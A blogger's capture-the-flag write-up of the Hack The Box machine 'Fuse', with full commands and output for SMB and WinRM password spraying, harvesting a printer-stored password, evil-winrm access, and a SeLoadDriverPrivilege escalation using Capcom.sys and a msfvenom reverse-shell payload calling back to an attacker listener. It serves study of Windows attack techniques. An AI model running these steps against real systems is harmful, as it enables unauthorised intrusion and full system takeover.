Hackthebox Fuse writeup
Introduction@Fuse:~$
| Column | Details |
|---|---|
| Name | Fuse |
| IP | 10.10.10.193 |
| Points | 30 |
| Os | Windows |
| Difficulty | Medium |
| Creator | aas |
| Out On | 13 June 2020 |
Brief@Fuse:~$
Got few usernames from the files from the website itself and making a custom wordlist from the website itself using cewl . Password Sparying using metasploit on the smb protocol , Got the correct username and password . Changed the password using smbpasswd and login to the rpcclient. Enumerating about printers . Got a password from the result , Again password sparying using crackmapexec on the winrm protocol got the username associated with it .Logged in using evil-winrm . The user is privileged to load the drivers as , And following an article compiling the necessary files using visual-studio and exploiting the SeLoadDriverPrivilege to get shell as administartor.
Summary :~$
- GOt domain from enum4linux
- Reading the
execl-filesgot from website - Making a users.txt file for the users got from excel-files
- making a
custom-wordlistusing cewl from thewebsiteitself Bruteforcethe smb protocol using metasploit and medusa- USing smbpasswd to reset the password of the user
tlavel - Enumerating shares
- Using
rpcclientto enumerate users - Got
printerinformation and apasswordfrom the enumprinters query - Login as
svc-print - Got user.txt
- Privilege-escalation by abusing
SeLoadDriverPrivilege - Compling all the files
- Generating a msf
maliciousfile - Creating the registry key as the file capcom.sys using
eoploaddriver.exe - Executing the ExploitCapcom.exe to run the
shell.exe - Got shell as
admin - Got root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
➜ fuse nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
# Nmap 7.80 scan initiated Sat Jun 13 21:00:25 2020 as: nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.34s latency).
Not shown: 65514 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesnt have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 01:19:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49743/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE5780A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h33m10s, deviation: 4h02m31s, median: 13m08s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-13T18:21:53-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-14T01:21:55
|_ start_date: 2020-06-13T19:13:43
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 13 21:11:22 2020 -- 1 IP address (1 host up) scanned in 657.60 seconds
So many ports are opened , interesting ones are DNS , SMB ,Winrm , HTTP
Port 80 (HTTP)
the fuse.htb is redirected to fuse.fabricorp.local …. added it to the /etc/hosts file
Fter adding and doing a refresh
There is a papercut runningb on this http port . And there are also some excel files
Download the Excel files
I downloaded all the three files and opened them
1.
2.
3.
These files contain some usernames i just extracted them all and save them in a users.txt
SMB Protocol
I tried to check if anonymous login is allowed or not on smb
1
2
3
4
5
6
7
➜ prashant smbclient -L fuse.htb
Enter WORKGROUP\roots password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Okay…so the anonymous login is allowed but we can not list the shares .
Enum4linux
1
2
➜ prashant enum4linux fuse.htb
Domain Name: FABRICORP
Got nothing rather than a domain-name : FABRICORP
Password Spraying on smb protocol
users.txt
1
2
3
4
5
➜ fuse cat users.txt
pmerton
tlavel
sthompson
bhult
These excel-files contain some usernames i just extracted them all and save them in a users.txt
Now what ??
After some time i decided to build a custom-wordlist from the website using cewl so i can bruteforce the login on smb protocol
1
2
➜ fuse cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
i tried password spraying with the same users.txt file using metasploit on the smb protocol
Using metasploit
The module i used in msf is auxiliary/scanner/smb/smb_login to bruteforce the login
1
2
3
4
5
6
7
8
9
10
11
12
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set USER_file users.txt
USER_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) >
msf5 auxiliary(scanner/smb/smb_login) > run
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
Using medusa
1
2
3
4
5
6
7
➜ fuse medusa -h fuse.htb -U users.txt -P wordlist -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT FOUND: [smbnt] Host: fuse.htb User: tlavel Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
ACCOUNT FOUND: [smbnt] Host: fuse.htb User: bhult Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
As i can see now that password is Fabricorp01 on which it got SUCCESS for both the users tlavel and bhult but it also says STATUS_PASSWORD_MUST_CHANGE.
Login using smbclient
1
2
3
➜ fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE
But i got the same error as got previously in medusa
Well we can reset the password using smbpasswd of a remote machine also if we know its old password…And since i know it so i can simply chnage the password
Changing smb password
1
2
3
4
5
➜ fuse smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on fuse.htb.
And yeah now i can list shares as user tlavel
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavels password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
After enumerating all the shares got nothing actually or i cant figured out thae thing i need.
Enumerating using rpcclient
I can reset the password again and login myself to rpcclient
1
2
3
➜ fuse rpcclient -U FABRICORP\\tlavel 10.10.10.193
Enter FABRICORP\tlavel's password:
rpcclient $>
Enum users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $>
Okay…so i got some usernames here and i saved them to another file called users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>
The user have some pretty good privileges on the machine
The website was about printers , Better if we just do some enum on printers.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
adddriver Add a print driver
addprinter Add a printer
deldriver Delete a printer driver
deldriverex Delete a printer driver with files
enumdata Enumerate printer data
enumdataex Enumerate printer data for a key
enumkey Enumerate printer keys
enumjobs Enumerate print jobs
getjob Get print job
setjob Set print job
enumports Enumerate printer ports
enumdrivers Enumerate installed printer drivers
enumprinters Enumerate printers
getdata Get print driver data
getdataex Get printer driver data with keyname
getdriver Get print driver information
getdriverdir Get print driver upload directory
getdriverpackagepath Get print driver package download directory
getprinter Get printer info
openprinter Open printer handle
openprinter_ex Open printer handle
setdriver Set printer driver
getprintprocdir Get print processor directory
addform Add form
setform Set form
getform Get form
deleteform Delete form
enumforms Enumerate forms
setprinter Set printer comment
setprintername Set printername
setprinterdata Set REG_SZ printer data
rffpcnex Rffpcnex test
printercmp Printer comparison test
enumprocs Enumerate Print Processors
enumprocdatatypes Enumerate Print Processor Data Types
enummonitors Enumerate Print Monitors
createprinteric Create Printer IC
There are some pretty good commands regarding the printers
enumprinters Enumerate printers
I cant list and enumerate the printers by using enumprinters
1
2
3
4
5
6
7
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
rpcclient $>
And herew I got lucky , Got a password here $fab@s3Rv1ce$1
Username spraying on winrm protocol
Now…since the winrm port is opened , And i can use crackmapexec or metasploit to spray usernames that i got from the rpcclient using enumdomusers
Using metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1'
PASSWORD => $fab@s3Rv1ce$1
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users
USER_FILE => users
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193
RHOSTS => 10.10.10.193
msf5 auxiliary(scanner/winrm/winrm_login) >
msf5 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
using crackmapexec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜ fuse crackmapexec winrm -u users -p '$fab@s3Rv1ce$1' -d FABRICORP fuse.htb
WINRM 10.10.10.193 5985 fuse.htb [*] http://10.10.10.193:5985/wsman
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\DefaultAccount:$fab@s3Rv1ce$1 "Failed to authenticate the user DefaultAccount with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\Administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user Administrator with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\krbtgt:$fab@s3Rv1ce$1 "Failed to authenticate the user krbtgt with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\bnielson:$fab@s3Rv1ce$1 "Failed to authenticate the user bnielson with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\dandrews:$fab@s3Rv1ce$1 "Failed to authenticate the user dandrews with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\mberbatov:$fab@s3Rv1ce$1 "Failed to authenticate the user mberbatov with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\astein:$fab@s3Rv1ce$1 "Failed to authenticate the user astein with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\dmuir:$fab@s3Rv1ce$1 "Failed to authenticate the user dmuir with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\svc-scan:$fab@s3Rv1ce$1 "Failed to authenticate the user svc-scan with ntlm"
WINRM 10.10.10.193 5985 fuse.htb [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
The user is svc-print and i can login myself to the machine using evil-winrm
1
2
3
4
5
6
7
8
➜ fuse evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
Got user.txt
1
2
*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
3148b09cce76eee40d9bc602744269c1
Privilege escaltion
Now its time for escalating the privileges
whoami /all
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts Group S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-print\desktop>
The permission seems very suspicious
1
SeLoadDriverPrivilege Load and unload device drivers Enabled
A quick google-search show me a good article on this
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
In this article its is shown that we cal load our own drivers and we can run a specific command as admin since we are already priviled to do it…
Compiling files
What i am gonna do is first compile both the two files
eoploaddriver.cpp
https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
ExploitCapcom.cpp
https://github.com/tandasat/ExploitCapcom
I compiled both the files using Visual-studio and got the exe files as obvious
We need to specify our command in the files ExploitCapcom.cpp at the line 292 in function Launchshell()
1
2
3
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
I changed the command to mine that will be a shell.exe so i can run my malicious binary created by msfvenom
1
2
3
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
And one more file that is capcom.sys
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Now first we need to create a shell.exe using msfvenom
Creating the malicious file
1
2
3
4
5
6
➜ files msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
And then upload all the four files to the machine
Uplaoding files
Uploading files
After uploading all the four files….
Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings
The driver will be the file capcom.sys and its absolute path
Exploitation
1
2
3
4
5
*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
Now start listner on metasploit
and run the file .\ExploitCapcom.exe for the final exploitation
Execute the
NTLoadDriverfunction, specifying the registry key previously created
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002B6CF0B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
*Evil-WinRM* PS C:\test>
And on our listener we got the shell as admin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Sending stage (176195 bytes) to 10.10.10.193
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400
meterpreter > shell
Process 576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\test>whoami
whoami
nt authority\system
Got root.txt
1
2
3
4
5
C:\Users\Administrator\Desktop>type root.txt
type root.txt
39bb8e320aecfcdd345fc2e7be64ceb7
C:\Users\Administrator\Desktop>
And we pwned it …….
If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP
If you want to get notified as soon as i upload something new to my
blogSo just click on the bell icon you are seeing on the right side – > and allow pushnotification
Resources
| Topic | Url |
|---|---|
| Article on seloaddriverprivilege | https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ |
| eoploaddriver.cpp | https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp |
| ExploitCapcom.cpp | https://github.com/tandasat/ExploitCapcom |
| capcom.sys | https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys |
This post is licensed under
CC BY 4.0
by the author.
Comments powered by Disqus.